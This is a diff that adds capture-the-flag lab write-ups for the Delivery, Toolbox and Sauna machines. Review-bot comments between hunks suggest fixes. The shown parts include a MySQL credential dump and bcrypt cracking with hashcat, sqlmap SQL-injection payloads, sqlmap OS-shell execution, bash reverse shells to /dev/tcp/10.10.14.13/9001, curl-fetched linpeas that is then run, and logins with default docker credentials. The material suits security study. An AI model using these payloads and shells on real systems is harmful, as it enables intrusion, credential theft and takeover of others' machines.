+ "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
+ "DataSourceReplicas": [],
+ "DataSourceSearchReplicas": [],
+ "MaxIdleConns": 20,
+ "ConnMaxLifetimeMilliseconds": 3600000,
+ "MaxOpenConns": 300,
+ "Trace": false,
+ "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
+ "QueryTimeout": 30,
+ "DisableDatabaseSearch": false
+ },
+
+
+
+Here we get the MySQL credentials **mmuser:Crack_The_MM_Admin_PW** , and an obvious hint that we need to crack the password we're about to find in the MySQL database:
+
+
+ maildeliverer@Delivery:/opt/mattermost/config$ mysql -u 'mmuser' -p
+ Enter password:
+ Welcome to the MariaDB monitor. Commands end with ; or \g.
+ Your MariaDB connection id is 75
+ Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
+
+ Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
+
+ Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
+
+ MariaDB [(none)]> show databases;
+ +--------------------+
+ | Database |
+ +--------------------+
+ | information_schema |
+ | mattermost |
+ +--------------------+
+ 2 rows in set (0.001 sec)
+
+ MariaDB [(none)]> use mattermost;
+ Reading table information for completion of table and column names
+ You can turn off this feature to get a quicker startup with -A
+
+ Database changed
+ MariaDB [mattermost]> select USERNAME,Password FROM Users;
+ +----------------------------------+--------------------------------------------------------------+
+ | USERNAME | Password |
+ +----------------------------------+--------------------------------------------------------------+
+ |**nihilist777 | $2a$10$dY8WN1vLdd0ZlEd0m53.ouWZXUVIgFHvMguur2g11CwssN0CdZA8q** |
+ | surveybot | |
+ | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK |
+ | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G |
+ |**root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO** |
+ | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq |
+ | channelexport | |
+ | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm |
+ +----------------------------------+--------------------------------------------------------------+
+ 8 rows in set (0.000 sec)
+
+
+Here we see our account's hashed password, but we also see the root user's hashed password, so let's save it locally:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → vim roothash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → cat roothash
+ $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
+
+ Not Found.
+ --------------------------------------------------
+
+
+Suprisingly hash-id can't identify the type of hash here, so let's identify it [online](https://hashes.com/en/tools/hash_identifier):
+
+
+
+So now we know that this is probably the **bcrypt $2*$** or **Blowfish (Unix)** algorithms. Looking back at the conversation we saw earlier, we remember that the root user was talking about the **PleaseSubscribe!** password "variant"
+
+
+
+So we can assume that the password used here is **PleaseSubscribe!** with some extra characters after it. Let's test that out with hashcat:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → echo 'PleaseSubscribe!' > pass.lst
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → cat pass.lst
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → hashcat --stdout pass.lst -r /usr/share/hashcat/rules/best64.rule > custom.lst
+
+ [ 10.10.14.13/23 ] [ /dev/pts/14 ] [~/HTB/Delivery]
+ → hashcat -m 3200 -a 3 "$(cat roothash)" custom.lst
+ hashcat (v6.1.1) starting...
+
+ [...]
+
+ The wordlist or mask that you are using is too small.
+ This means that hashcat cannot use the full parallel power of your device(s).
+ Unless you supply more work, your cracking speed will drop.
+ For tips on supplying more work, see: https://hashcat.net/faq/morework
+
+ Approaching final keyspace - workload adjusted.
+
+ **$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21**
+
+ Session..........: hashcat
+ Status...........: Cracked
+ Hash.Name........: bcrypt $2*$, Blowfish (Unix)
+ Hash.Target......: $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v...JwgjjO
+ Time.Started.....: Mon Jun 7 12:42:41 2021 (1 sec)
+ Time.Estimated...: Mon Jun 7 12:42:42 2021 (0 secs)
+ Guess.Mask.......: PleaseSubscribe!21 [18]
+ Guess.Queue......: 21/77 (27.27%)
+ Speed.#1.........: 1 H/s (2.61ms) @ Accel:2 Loops:4 Thr:12 Vec:1
+ Recovered........: 1/1 (100.00%) Digests
+ Progress.........: 1/1 (100.00%)
+ Rejected.........: 0/1 (0.00%)
+ Restore.Point....: 0/1 (0.00%)
+ Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1020-1024
+ Candidates.#1....: PleaseSubscribe!21 -> PleaseSubscribe!21
+ Hardware.Mon.#1..: Temp: 41c Fan: 0% Util:100% Core:1797MHz Mem:3504MHz Bus:16
+
+ Started: Mon Jun 7 12:42:20 2021
+ Stopped: Mon Jun 7 12:42:43 2021
+
+
+And we found the password! **PleaseSubscribe!21** so let's try to login as the root user:
+
+
+ maildeliverer@Delivery:/opt/mattermost/config$ su
+ Password:
+ root@Delivery:/opt/mattermost/config# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@Delivery:/opt/mattermost/config# cat /root/root.txt
+ c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to privesc to the root user, and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
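Review bot: the hashcat invocation `hashcat -m 3200 -a 3 "$(cat roothash)" custom.lst` uses attack mode 3 (mask attack) with a candidate wordlist; `-a 0` (straight/dictionary mode) is what the preceding `--stdout ... -r best64.rule > custom.lst` step is building for. With `-a 3` hashcat reads custom.lst as a mask file, one mask per line, which is why the output reports `Guess.Mask.......: PleaseSubscribe!21 [18]` and `Guess.Queue......: 21/77`; it only worked because none of the generated candidates contain a `?` mask token, so each line was treated as a literal. Either switch to `-a 0` or say in the text that the file is being consumed as masks, so readers do not copy a command that silently changes meaning with other wordlists. Smaller points in the same hunk: "Suprisingly" should be "Surprisingly"; the screenshot embeds after the hash-identifier step, after the Mattermost conversation, and under "Here we can see the progress graph :" are empty, so the referenced images never render. The hashcat summary is also worth a sentence of commentary in the writeup: at `Speed.#1.........: 1 H/s` the bcrypt cost-10 hash is doing exactly what it should against brute force, and the crack succeeded only because the password was a predictable variant of one already disclosed in the chat, which is the reuse lesson the section is really about.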
diff --git a/Easy/56.md b/Easy/56.md
new file mode 100644
index 0000000..16e28c3
--- /dev/null
+++ b/Easy/56.md
@@ -0,0 +1,478 @@
+# Toolbox Writeup
+
+
+
+## Introduction :
+
+Toolbox is an easy Windows box released back in March 2021.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → nmap -vvv -p- 10.10.10.236 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 21/tcp on 10.10.10.236
+ Discovered open port 443/tcp on 10.10.10.236
+ Discovered open port 135/tcp on 10.10.10.236
+ Discovered open port 22/tcp on 10.10.10.236
+ Discovered open port 139/tcp on 10.10.10.236
+ Discovered open port 445/tcp on 10.10.10.236
+ Discovered open port 47001/tcp on 10.10.10.236
+ Discovered open port 5985/tcp on 10.10.10.236
+ Discovered open port 49668/tcp on 10.10.10.236
+ Discovered open port 49666/tcp on 10.10.10.236
+ Discovered open port 49667/tcp on 10.10.10.236
+ Discovered open port 49665/tcp on 10.10.10.236
+ Discovered open port 49669/tcp on 10.10.10.236
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → nmap -sCV -p 21,22,135,139,445,443 10.10.10.236
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-07 17:43 CEST
+ Nmap scan report for 10.10.10.236
+ Host is up (0.027s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp FileZilla ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_-r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
+ | ftp-syst:
+ |_ SYST: UNIX emulated by FileZilla
+ 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
+ | 256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
+ |_ 256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 443/tcp open ssl/http Apache httpd 2.4.38 ((Debian))
+ |_http-server-header: Apache/2.4.38 (Debian)
+ |_http-title: MegaLogistics
+ | ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
+ | Not valid before: 2020-02-18T17:45:56
+ |_Not valid after: 2021-02-17T17:45:56
+ |_ssl-date: TLS randomness does not represent time
+ | tls-alpn:
+ |_ http/1.1
+ 445/tcp open microsoft-ds?
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 7m50s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-06-07T15:51:45
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 21.46 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Now our nmap scan picked up port 443 so let's visit it:
+
+
+
+Our nmap scan also picked up the **admin.megalogistic.com** domain name from the self-signed SSL certificate, so let's add it to our hosts file:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → sudo -i
+ [sudo] password for nothing:
+ ┌──(root💀nowhere)-[~]
+ └─# echo '10.10.10.236 admin.megalogistic.com' >> /etc/hosts
+
+ ┌──(root💀nowhere)-[~]
+ └─# ping admin.megalogistic.com -c1
+ PING admin.megalogistic.com (10.10.10.236) 56(84) bytes of data.
+ 64 bytes from admin.megalogistic.com (10.10.10.236): icmp_seq=1 ttl=127 time=129 ms
+
+ --- admin.megalogistic.com ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 129.228/129.228/129.228/0.000 ms
+
+ ┌──(root💀nowhere)-[~]
+ └─# exit
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ →
+
+
+
+Now before we check out the domain name let's also take a look at the FileZilla FTP server that our nmap scan picked up:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → ftp 10.10.10.236
+ Connected to 10.10.10.236.
+ 220-FileZilla Server 0.9.60 beta
+ 220-written by Tim Kosse (tim.kosse@filezilla-project.org)
+ 220 Please visit https://filezilla-project.org/
+ Name (10.10.10.236:nothing): anonymous
+ 331 Password required for anonymous
+ Password:
+ 230 Logged on
+ Remote system type is UNIX.
+ ftp> ls
+ 200 Port command successful
+ 150 Opening data channel for directory listing of "/"
+ -r-xr-xr-x 1 ftp ftp 242520560 Feb 18 2020 docker-toolbox.exe
+ 226 Successfully transferred "/"
+ ftp>
+
+
+As expected there is anonymous login allowed. And here we find a docker-toolbox executable file, so we are hinted towards the fact that this box is running docker containers. Now back to the domain name we just added:
+
+
+
+Here we see that we get an admin login page, and we see that guessing the password isn't going to work, so we try out basic SQL injections, to do so we use burpsuite to get the POST request:
+
+
+
+Here just right click, copy to file and you get the following:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/45 ] [~/HTB/Toolbox]
+ → ls -lash login.req
+ 4.0K -rw-r--r-- 1 nothing nothing 561 Jun 7 18:28 login.req
+
+ [ 10.10.14.13/23 ] [ /dev/pts/45 ] [~/HTB/Toolbox]
+ → cat login.req
+ POST / HTTP/1.1
+ Host: admin.megalogistic.com
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 29
+ Origin: https://admin.megalogistic.com
+ Connection: close
+ Referer: https://admin.megalogistic.com/
+ Cookie: PHPSESSID=5f60c9a2d0777eada696244e34c22bc5
+ Upgrade-Insecure-Requests: 1
+
+ username=admin&password;=admin
+
+
+
+Let's use sqlmap to enumerate for potential SQL injections:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → sqlmap -r login.req --risk=3 --level=3 --batch --force-ssl
+ ___
+ __H__
+ ___ ___["]_____ ___ ___ {1.5.5#stable}
+ |_ -| . ["] | .'| . |
+ |___|_ [']_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 18:30:23 /2021-06-07/
+
+ [18:30:23] [INFO] parsing HTTP request from 'login.req'
+ [18:30:24] [INFO] testing connection to the target URL
+ [18:30:24] [INFO] testing if the target URL content is stable
+ [18:30:24] [INFO] target URL content is stable
+ [18:30:24] [INFO] testing if POST parameter 'username' is dynamic
+ [18:30:25] [WARNING] POST parameter 'username' does not appear to be dynamic
+ [18:30:25] [INFO] heuristic (basic) test shows that POST parameter 'username' might be injectable (possible DBMS: 'PostgreSQL')
+ [18:30:25] [INFO] testing for SQL injection on POST parameter 'username'
+ it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
+ for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (3) value? [Y/n] Y
+ [18:30:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
+ got a 302 redirect to 'https://admin.megalogistic.com:443/dashboard.php'. Do you want to follow? [Y/n] Y
+ redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] N
+ [18:30:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
+ [18:30:36] [INFO] POST parameter 'username' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=302)
+ [18:30:36] [INFO] testing 'Generic inline queries'
+ [18:30:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
+ [18:30:37] [INFO] POST parameter 'username' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
+ [18:30:37] [INFO] testing 'PostgreSQL inline queries'
+ [18:30:37] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
+ [18:30:48] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
+ [18:30:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
+ [18:30:59] [INFO] POST parameter 'username' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
+ [18:30:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
+ [18:30:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
+ [18:31:04] [INFO] target URL appears to be UNION injectable with 2 columns
+ injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
+ [18:31:08] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
+ [18:31:08] [INFO] testing 'Generic UNION query (51) - 21 to 40 columns'
+ [18:31:12] [INFO] testing 'Generic UNION query (51) - 41 to 60 columns'
+ [18:31:17] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
+ POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+ sqlmap identified the following injection point(s) with a total of 135 HTTP(s) requests:
+ ---
+ **Parameter: username (POST)**
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause
+ **Payload: username=-9325' OR 5396=5396-- MhIJ &password;=admin**
+
+ Type: error-based
+ Title: PostgreSQL AND error-based - WHERE or HAVING clause
+ Payload: username=admin' AND 8746=CAST((CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (8746=8746) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC)-- IKYc&password;=admin
+
+ Type: stacked queries
+ Title: PostgreSQL > 8.1 stacked queries (comment)
+ Payload: username=admin';SELECT PG_SLEEP(5)--&password;=admin
+
+ Type: time-based blind
+ Title: PostgreSQL > 8.1 AND time-based blind
+ Payload: username=admin' AND 2290=(SELECT 2290 FROM PG_SLEEP(5))-- sWjK&password;=admin
+ ---
+ [18:31:17] [INFO] the back-end DBMS is PostgreSQL
+ web server operating system: Linux Debian 10 (buster)
+ web application technology: PHP 7.3.14, Apache 2.4.38
+ back-end DBMS: PostgreSQL
+ [18:31:19] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/admin.megalogistic.com'
+
+ [*] ending @ 18:31:19 /2021-06-07/
+
+
+
+Here we see that sqlmap managed to pickup that this was a PostgreSQL database, let's see if we can spawn a shell:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Toolbox]
+ → sqlmap -r login.req --risk=3 --level=3 --batch --force-ssl --os-shell
+ ___
+ __H__
+ ___ ___[']_____ ___ ___ {1.5.5#stable}
+ |_ -| . [)] | .'| . |
+ |___|_ [']_|_|_|__,| _|
+ |_|V... |_| http://sqlmap.org
+
+ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+ [*] starting @ 18:35:16 /2021-06-07/
+
+ [18:35:16] [INFO] parsing HTTP request from 'login.req'
+ [18:35:16] [INFO] resuming back-end DBMS 'postgresql'
+ [18:35:16] [INFO] testing connection to the target URL
+ sqlmap resumed the following injection point(s) from stored session:
+ ---
+ Parameter: username (POST)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause
+ Payload: username=-9325' OR 5396=5396-- MhIJ&password;=admin
+
+ Type: error-based
+ Title: PostgreSQL AND error-based - WHERE or HAVING clause
+ Payload: username=admin' AND 8746=CAST((CHR(113)||CHR(122)||CHR(98)||CHR(113)||CHR(113))||(SELECT (CASE WHEN (8746=8746) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(113)||CHR(98)||CHR(113)) AS NUMERIC)-- IKYc&password;=admin
+
+ Type: stacked queries
+ Title: PostgreSQL > 8.1 stacked queries (comment)
+ Payload: username=admin';SELECT PG_SLEEP(5)--&password;=admin
+
+ Type: time-based blind
+ Title: PostgreSQL > 8.1 AND time-based blind
+ Payload: username=admin' AND 2290=(SELECT 2290 FROM PG_SLEEP(5))-- sWjK&password;=admin
+ ---
+ [18:35:16] [INFO] the back-end DBMS is PostgreSQL
+ web server operating system: Linux Debian 10 (buster)
+ web application technology: PHP 7.3.14, Apache 2.4.38
+ back-end DBMS: PostgreSQL
+ [18:35:16] [INFO] fingerprinting the back-end DBMS operating system
+ [18:35:17] [INFO] the back-end DBMS operating system is Linux
+ [18:35:18] [INFO] testing if current user is DBA
+ [18:35:18] [INFO] retrieved: '1'
+ [18:35:19] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
+ [18:35:19] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
+
+ os-shell> id
+ do you want to retrieve the command standard output? [Y/n/a] Y
+ [18:35:45] [INFO] retrieved: 'uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)'
+
+ os-shell> which bash
+ do you want to retrieve the command standard output? [Y/n/a] Y
+ [18:39:18] [INFO] retrieved: '/bin/bash'
+
+
+
+And we can! Now that we can execute system commands as the postgres user let's get a bash reverse shell:
+
+
+ [term1]
+
+ os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.13/9001 0>&1'
+ do you want to retrieve the command standard output? [Y/n/a] Y
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.236] 50037
+ bash: cannot set terminal process group (934): Inappropriate ioctl for device
+ bash: no job control in this shell
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ id
+ id
+ uid=102(postgres) gid=104(postgres) groups=104(postgres),102(ssl-cert)
+
+
+
+Now from let's get the user flag:
+
+
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ls ~
+ ls ~
+ 11
+ user.txt
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ cat ~/user.txt
+ cat ~/user.txt
+ f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX flag.txt
+
+
+
+And that's it ! We managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now before we move on let's first upgrade our reverse shell to a fully interactive TTY:
+
+
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ which python python3 bash
+ which python python3 bash
+ /usr/bin/python3
+ /bin/bash
+
+ #spawn a TTY with python3
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty; pty.spawn("/bin/bash")'
+
+ #background the reverse shell (CTRL+Z)
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ^Z
+ [1] + 4044233 suspended nc -lvnp 9001
+
+ #set stty raw -echo and then fg the reverse shell once again
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → stty raw -echo ; fg
+ [1] + 4044233 continued nc -lvnp 9001
+
+ #export the TERM and SHELL variables
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ export TERM=screen-256color
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ export SHELL=bash
+
+ #set the TTY rows
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ stty rows 40 columns 125
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ reset
+
+
+
+Let's get linpeas.sh onto the box to enumerate it:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Toolbox]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ curl http://10.10.14.13:9090/linpeas.sh > /tmp/peas.sh
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 333k 100 333k 0 0 1694k 0 --:--:-- --:--:-- --:--:-- 1694k
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ chmod +x /tmp/peas.sh
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ /tmp/peas.sh
+
+
+` 
+
+Scrolling through the output of linpeas we see the following:
+
+
+
+We're on a boot2docker debian container, and scrolling further we see the following:
+
+
+
+And here we see that the ip on the eth0 interface is 172.17.0.2. The previous hint Boot2Docker, is a distribution on VirtualBox, and the default credentials are **docker/tcuser** , we can guess that the docker host is at the **172.17.0.1** IP address.
+
+Warning, you will have to redo your reverse shell because the container is unstable:
+
+
+ bash: [1078: 2 (255)] tcsetattr: Inappropriate ioctl for device
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$
+
+
+So let's spawn our reverse shell once more:
+
+
+ [term1]
+
+ os-shell> bash -c 'bash -i >& /dev/tcp/10.10.14.13/9001 0>&1'
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Toolbox]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.236] 50075
+ bash: cannot set terminal process group (2876): Inappropriate ioctl for device
+ bash: no job control in this shell
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ ssh docker@172.17.0.1
+ ssh docker@172.17.0.1
+ docker@172.17.0.1's password: tcuser
+
+ ( '>')
+ /) TC (\ Core is distributed with ABSOLUTELY NO WARRANTY.
+ (/-_--_-\) www.tinycorelinux.net
+
+ docker@box:~$ id
+ id
+ uid=1000(docker) gid=50(staff) groups=50(staff),100(docker)
+
+
+
+And as expected we have been able to access the docker host with the default credentials! Now let's see if we can access the **C:\Users** folder mounted at **/c/Users**.
+
+
+ docker@box:~$ cd /c/Users
+ cd /c/Users
+
+ docker@box:/c/Users$ ls
+ ls
+ Administrator Default Public desktop.ini
+ All Users Default User Tony
+
+ docker@box:/c/Users$ cd Administrator
+ cd Administrator
+
+ docker@box:/c/Users/Administrator$ cd Desktop
+ cd Desktop
+
+ docker@box:/c/Users/Administrator/Desktop$ ls
+ ls
+ desktop.ini root.txt
+
+ docker@box:/c/Users/Administrator/Desktop$ cat root.txt
+ cat root.txt
+ ccXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
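Review bot: the captured request body and every sqlmap payload in this hunk carry a stray semicolon after the parameter name, `username=admin&password;=admin`, which is an HTML-entity rendering artifact rather than what was sent; the request's own `Content-Length: 29` matches `username=admin&password=admin` exactly (30 with the `;`), so the markdown should drop the `;` or a reader copying login.req will replay a malformed body and sqlmap will target the wrong parameter. Other fixes in the same file: the line containing only a backtick after the linpeas block is a stray, unclosed fence marker; "Now from let's get the user flag:" is missing a word; the user-flag line `f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX flag.txt` has a trailing `flag.txt` token that is not part of `cat ~/user.txt` output; "The previous hint Boot2Docker, is a distribution on VirtualBox" needs rewording (Boot2Docker is the minimal Linux VM that Docker Toolbox runs under VirtualBox); and the screenshot embeds for the HTTPS landing page, the Burp capture, the two linpeas excerpts and the progress graph are empty, so none of those images render. The writeup would also be stronger if it named the root causes the output already exposes: sqlmap's `testing if current user is DBA` / `retrieved: '1'` shows the web application connects to PostgreSQL as a superuser, which is the only reason `COPY ... FROM PROGRAM` command execution is available, and the container can reach the Boot2Docker host at the bridge gateway 172.17.0.1 with the unchanged default `docker/tcuser` credentials while the host's `C:\Users` is mounted at `/c/Users`; stating those three misconfigurations (over-privileged DB role, default credentials, host directory mounted into the container VM) is what turns this from a walkthrough into something a defender can act on.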
diff --git a/Easy/57.md b/Easy/57.md
new file mode 100644
index 0000000..a4bad49
--- /dev/null
+++ b/Easy/57.md
@@ -0,0 +1,540 @@
+# Sauna Writeup
+
+
+
+## Introduction :
+
+Sauna is an easy Windows Box released back in Febuary 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Sauna]
+ → nmap -vvv -p- 10.10.10.175 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 445/tcp on 10.10.10.175
+ Discovered open port 135/tcp on 10.10.10.175
+ Discovered open port 139/tcp on 10.10.10.175
